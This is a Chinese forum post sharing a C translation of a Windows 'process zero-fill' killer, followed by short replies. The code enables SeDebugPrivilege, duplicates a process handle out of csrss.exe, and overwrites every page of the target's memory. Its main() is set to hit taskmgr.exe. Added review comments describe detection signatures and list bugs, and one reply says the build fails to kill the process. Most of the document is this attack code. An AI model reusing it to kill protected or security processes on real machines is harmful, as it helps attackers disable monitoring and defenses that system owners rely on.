EP_X0FF进程填零的C代码版。
因为当时没有Delphi编译器,只好自己翻成C了。
/*
 * This simple app demonstrates how to kill a process by writing the process's
 * memory. Written by EP_X0FF and DNY; I just translated it to C ---- zjjmj2002
 *
 * Review notes (defender's view): main() enables SeDebugPrivilege, KillIce()
 * opens csrss.exe, walks the SystemHandleInformation table for process
 * handles held by csrss.exe, duplicates each into this process, and for the
 * one whose PID equals the target overwrites every page of the target's
 * user-mode address space with the (zeroed) scratch buffer. Each step is an
 * observable event for host telemetry: the privilege adjustment, the
 * PROCESS_ALL_ACCESS open of csrss.exe, ZwDuplicateObject out of csrss.exe,
 * and cross-process ZwProtectVirtualMemory / ZwWriteVirtualMemory calls.
 * Almost no NTSTATUS/BOOL return values are checked, so failures are silent.
 */
#include <Windows.h>
#include <Ntsecapi.h>
#include <Aclapi.h>
#include <tlhelp32.h>
#pragma comment (lib,"ntdll.lib") // copied from the DDK
#pragma comment (lib,"Kernel32.lib")
#pragma comment (lib,"Advapi32.lib")
#pragma comment(linker, "/ENTRY:main")

//------------------ data type declarations begin --------------------//

/* Private copy of the structure filled by ZwQueryInformationProcess with
 * class 0 below; only UniqueProcessId is read in this file.
 * NOTE(review): NTSTATUS is typedef'd further down in this file, after this
 * first use; whether it builds depends on Ntsecapi.h already providing it. */
typedef struct _PROCESS_BASIC_INFORMATION {
    NTSTATUS ExitStatus;
    ULONG PebBaseAddress;
    ULONG_PTR AffinityMask;
    LONG BasePriority;
    ULONG_PTR UniqueProcessId;
    ULONG_PTR InheritedFromUniqueProcessId;
} PROCESS_BASIC_INFORMATION;
typedef PROCESS_BASIC_INFORMATION *PPROCESS_BASIC_INFORMATION;

/* One entry of the SystemHandleInformation result; KillIce treats the
 * buffer as a ULONG count followed by an array of these. */
typedef struct _SYSTEM_HANDLE_INFORMATION {
    ULONG ProcessId;
    UCHAR ObjectTypeNumber;
    UCHAR Flags;
    USHORT Handle;
    PVOID Object;
    ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;

/* Declared but not used anywhere in this listing. */
typedef struct _SYSTEM_MODULE_INFORMATION {
    ULONG Reserved[2];
    PVOID Base;
    ULONG Size;
    ULONG Flags;
    USHORT Index;
    USHORT Unknown;
    USHORT LoadCount;
    USHORT ModuleNameOffset;
    CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

/* Passed (all-zero except Length) to ZwOpenProcess in KillIce. */
typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

/* Declared but not used anywhere in this listing. */
typedef enum _SECTION_INHERIT {
    ViewShare = 1,
    ViewUnmap = 2
} SECTION_INHERIT;

/* Declared but not used anywhere in this listing. */
typedef struct _MY_PROCESS_INFO {
    ULONG PID;
    ULONG KPEB;
    ULONG CR3;
    CHAR Name[16];
    ULONG Reserved;
} MY_PROCESS_INFO, *PMY_PROCESS_INFO;

/* Target of ZwOpenProcess: only UniqueProcess is set (csrss.exe PID). */
typedef struct _CLIENT_ID {
    HANDLE UniqueProcess;
    HANDLE UniqueThread;
} CLIENT_ID;
typedef CLIENT_ID *PCLIENT_ID;

typedef long NTSTATUS;
//------------------ data type declarations end --------------------//

//--------------------- predefinitions begin -----------------------//
/* Only STATUS_SUCCESS, SystemHandleInformation and the OBJECT_ATTRIBUTES
 * layout are actually used below; the rest is carried over for reference. */
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define STATUS_SUCCESS 0x00000000
#define STATUS_UNSUCCESSFUL 0xC0000001
#define STATUS_NOT_IMPLEMENTED 0xC0000002
#define STATUS_INFO_LENGTH_MISMATCH 0xC0000004
#define STATUS_INVALID_PARAMETER 0xC000000D
#define STATUS_ACCESS_DENIED 0xC0000022
#define STATUS_BUFFER_TOO_SMALL 0xC0000023
#define OBJ_KERNEL_HANDLE 0x00000200
#define SystemModuleInformation 11
#define SystemHandleInformation 0x10
/* Not used by KillIce, which fills OBJECT_ATTRIBUTES field by field. */
#define InitializeObjectAttributes( p, n, a, r, s ) { (p)->Length = sizeof( OBJECT_ATTRIBUTES );(p)->RootDirectory = r; (p)->Attributes = a; (p)->ObjectName = n; (p)->SecurityDescriptor = s; (p)->SecurityQualityOfService = NULL; }
//--------------------- predefinitions end -----------------------//

//------------------ Native API declarations begin ------------------//
/* Hand-written prototypes for ntdll exports (resolved via ntdll.lib above).
 * NOTE(review): these are the author's own declarations, not the DDK
 * headers; parameter types here (e.g. PVOID ProcessInformationClass,
 * PHANDLE SourceHandle) should be checked against the documented API
 * before trusting the calls below. */
NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation(
    ULONG SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength );

NTSYSAPI NTSTATUS NTAPI ZwOpenProcess(
    OUT PHANDLE ProcessHandle,
    IN ACCESS_MASK AccessMask,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    IN PCLIENT_ID ClientId );

NTSYSAPI NTSTATUS NTAPI ZwAllocateVirtualMemory(
    IN HANDLE ProcessHandle,
    IN OUT PVOID *BaseAddress,
    IN ULONG ZeroBits,
    IN OUT PULONG RegionSize,
    IN ULONG AllocationType,
    IN ULONG Protect );

NTSYSAPI NTSTATUS NTAPI ZwDuplicateObject(
    IN HANDLE SourceProcessHandle,
    IN PHANDLE SourceHandle,
    IN HANDLE TargetProcessHandle,
    OUT PHANDLE TargetHandle,
    IN ACCESS_MASK DesiredAccess OPTIONAL,
    IN BOOLEAN InheritHandle,
    IN ULONG Options );

NTSYSAPI NTSTATUS NTAPI ZwQueryInformationProcess(
    IN HANDLE ProcessHandle,
    IN PVOID ProcessInformationClass,
    OUT PVOID ProcessInformation,
    IN ULONG ProcessInformationLength,
    OUT PULONG ReturnLength );

NTSYSAPI NTSTATUS NTAPI ZwProtectVirtualMemory(
    IN HANDLE ProcessHandle,
    IN OUT PVOID *BaseAddress,
    IN OUT PULONG NumberOfBytesToProtect,
    IN ULONG NewAccessProtection,
    OUT PULONG OldAccessProtection );

NTSYSAPI NTSTATUS NTAPI ZwWriteVirtualMemory(
    IN HANDLE ProcessHandle,
    IN PVOID BaseAddress,
    IN PVOID Buffer,
    IN ULONG NumberOfBytesToWrite,
    OUT PULONG NumberOfBytesWritten OPTIONAL );

NTSYSAPI NTSTATUS NTAPI ZwClose(
    IN HANDLE ObjectHandle );

NTSYSAPI NTSTATUS NTAPI ZwFreeVirtualMemory(
    IN HANDLE ProcessHandle,
    IN PVOID *BaseAddress,
    IN OUT PULONG RegionSize,
    IN ULONG FreeType );
//------------------ Native API declarations end ------------------//

//------------------ program proper begins ------------------//

/*
 * GetPidByName - return the PID of the first running process whose image
 * name equals szName (case-insensitive, lstrcmpi), or 0 when no process
 * matches or the snapshot cannot be taken.
 *
 * NOTE(review): on the Process32First failure path the function returns
 * without closing hProcessSnap (handle leak); the later CloseHandle guard
 * is redundant because INVALID_HANDLE_VALUE was already rejected above.
 */
DWORD GetPidByName(char *szName)
{
    HANDLE hProcessSnap = INVALID_HANDLE_VALUE;
    PROCESSENTRY32 pe32={0};
    DWORD dwRet=0;
    hProcessSnap =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if(hProcessSnap == INVALID_HANDLE_VALUE)return 0;
    pe32.dwSize = sizeof(PROCESSENTRY32);
    if(Process32First(hProcessSnap, &pe32))
    {
        do
        {
            if(lstrcmpi(szName,pe32.szExeFile)==0)
            {
                dwRet=pe32.th32ProcessID;
                break;
            }
        }while (Process32Next(hProcessSnap,&pe32));
    }
    else return 0; /* snapshot handle is not closed on this path */
    if(hProcessSnap !=INVALID_HANDLE_VALUE)CloseHandle(hProcessSnap);
    return dwRet;
}

/*
 * KillIce - overwrite the user-mode address space of process dwProcessId
 * using a process handle borrowed from csrss.exe.
 *
 * Flow as written:
 *   1. open csrss.exe with PROCESS_ALL_ACCESS (requires SeDebugPrivilege,
 *      enabled by main());
 *   2. allocate a 4 MiB zero-filled buffer and fill it with the
 *      SystemHandleInformation table;
 *   3. for each entry owned by csrss.exe with ObjectTypeNumber 5 (the
 *      author's assumed "Process" type index), duplicate the handle into
 *      this process and query its basic information;
 *   4. when UniqueProcessId equals the target, walk 0x1000..0x7FFFF000 in
 *      page steps, make each page RWX and write 0x1000 bytes from the
 *      buffer over it, then close the duplicate;
 *   5. release the buffer.
 *
 * NOTE(review): the handle returned by ZwOpenProcess is never closed, and
 * duplicates whose PID does not match are not closed either. pbi is read
 * even when ZwDuplicateObject did not succeed (the comparison sits outside
 * that if), so it may hold stale or uninitialised data. The loop index i is
 * reused by the inner page loop, so after one match the outer loop ends.
 * The NumOfHandle / h_info lines do not match their declared types as
 * transcribed, so the listing should be treated as illustrative rather than
 * as a buildable program. From a detection standpoint, the sequence
 * "open csrss.exe -> ZwDuplicateObject from csrss.exe -> RWX protect +
 * write across another process" is the signature to alert on.
 */
void KillIce(ULONG dwProcessId)
{
    HANDLE ph, h_dup;
    ULONG bytesIO;
    PVOID buf;
    ULONG i;
    CLIENT_ID cid1;
    OBJECT_ATTRIBUTES attr;
    HANDLE csrss_id;
    HANDLE SnapShotHandle; /* unused */
    PROCESS_BASIC_INFORMATION pbi;
    PVOID p0, p1;
    ULONG sz, oldp;
    ULONG NumOfHandle;
    PSYSTEM_HANDLE_INFORMATION h_info;

    /* GetPidByName returns 0 when csrss.exe is not found; not checked. */
    csrss_id = (HANDLE)GetPidByName("csrss.exe");

    /* Equivalent of InitializeObjectAttributes(&attr, 0, 0, 0, 0). */
    attr.Length = sizeof(OBJECT_ATTRIBUTES);
    attr.RootDirectory = 0;
    attr.ObjectName = 0;
    attr.Attributes = 0;
    attr.SecurityDescriptor = 0;
    attr.SecurityQualityOfService = 0;
    cid1.UniqueProcess = csrss_id;
    cid1.UniqueThread = 0;
    /* Return status ignored; ph is uninitialised if this fails. */
    ZwOpenProcess(&ph, PROCESS_ALL_ACCESS, &attr, &cid1);

    /* 4 MiB committed buffer; doubles as the zero source for the writes. */
    bytesIO = 0x400000;
    buf = 0;
    ZwAllocateVirtualMemory(GetCurrentProcess(), &buf, 0, &bytesIO, MEM_COMMIT, PAGE_READWRITE);
    /* Fixed-size query; STATUS_INFO_LENGTH_MISMATCH is not handled. */
    ZwQuerySystemInformation(SystemHandleInformation, buf, 0x400000, &bytesIO);
    NumOfHandle = (ULONG)buf;
    h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf+4);
    for (i= 0 ; i<NumOfHandle; i++)
    {
        if ((h_info.ProcessId == (ULONG)csrss_id)&&(h_info.ObjectTypeNumber == 5))
        {
            if (ZwDuplicateObject(ph, (PHANDLE)h_info.Handle, (HANDLE)-1, &h_dup, 0, 0, DUPLICATE_SAME_ACCESS) == STATUS_SUCCESS)
                /* class 0 = ProcessBasicInformation (author's convention) */
                ZwQueryInformationProcess(h_dup, 0, &pbi, sizeof(pbi), &bytesIO);
            /* Evaluated even when the duplicate/query above did not run. */
            if (pbi.UniqueProcessId == dwProcessId)
            {
                MessageBox(0, "目标已确定!", "OK", MB_OK);
                /* Page-by-page over the whole 32-bit user range. */
                for (i = 0x1000; i<0x80000000; i = i + 0x1000)
                {
                    p0 = (PVOID)i;
                    p1 = p0;
                    sz = 0x1000;
                    if (ZwProtectVirtualMemory(h_dup, &p1, &sz, PAGE_EXECUTE_READWRITE, &oldp) == STATUS_SUCCESS)
                    {
                        /* oldp is reused here as the bytes-written output */
                        ZwWriteVirtualMemory(h_dup, p0, buf, 0x1000, &oldp);
                    }
                }
                MessageBox(0, "任务已完成!","OK", 0);
                ZwClose(h_dup);
            }
        }
    }
    /* RegionSize 0 + MEM_RELEASE frees the whole allocation. */
    bytesIO = 0;
    ZwFreeVirtualMemory(GetCurrentProcess(), &buf, &bytesIO, MEM_RELEASE);
}

/*
 * EnablePrivilege - enable (fEnable != 0) or disable one named privilege on
 * hToken. Returns TRUE only if GetLastError() is ERROR_SUCCESS after
 * AdjustTokenPrivileges. The LookupPrivilegeValue and AdjustTokenPrivileges
 * return values themselves are not checked.
 */
BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable)
{
    TOKEN_PRIVILEGES tp;
    tp.PrivilegeCount = 1;
    LookupPrivilegeValue(NULL,szPrivName,&tp.Privileges[0].Luid);
    tp.Privileges[0].Attributes = fEnable ? SE_PRIVILEGE_ENABLED:0;
    AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL);
    return((GetLastError() == ERROR_SUCCESS));
}

/*
 * main - raw entry point (see the /ENTRY:main linker pragma; no CRT
 * startup). Enables SeDebugPrivilege on the current token, looks up
 * taskmgr.exe and hands its PID to KillIce. OpenProcessToken and
 * EnablePrivilege results are ignored, and hToken is never closed.
 */
void main()
{
    ULONG Pid;
    HANDLE hToken;
    OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken);
    EnablePrivilege(hToken,SE_DEBUG_NAME,TRUE);
    if (Pid = GetPidByName("taskmgr.exe")) /* assignment used as condition: non-zero PID */
    {
        KillIce(Pid);
    }
    ExitProcess(0);
}
驱动小牛
发布于:2007-09-16 14:57
收藏.
发布于:2007-09-16 19:55
存起来先,有空再看
发布于:2007-09-16 21:55
第一次看楼主写C代码~
不过我记得yyking放的是驱动版的填0~
发布于:2007-09-17 01:05
填0?酷
发布于:2007-09-21 21:48
试试!
发布于:2008-10-31 15:22
学习了!
发布于:2009-03-22 00:42
编译成功,不能结束进程。
发布于:2009-06-22 22:42
学习ing。。。。。。。。。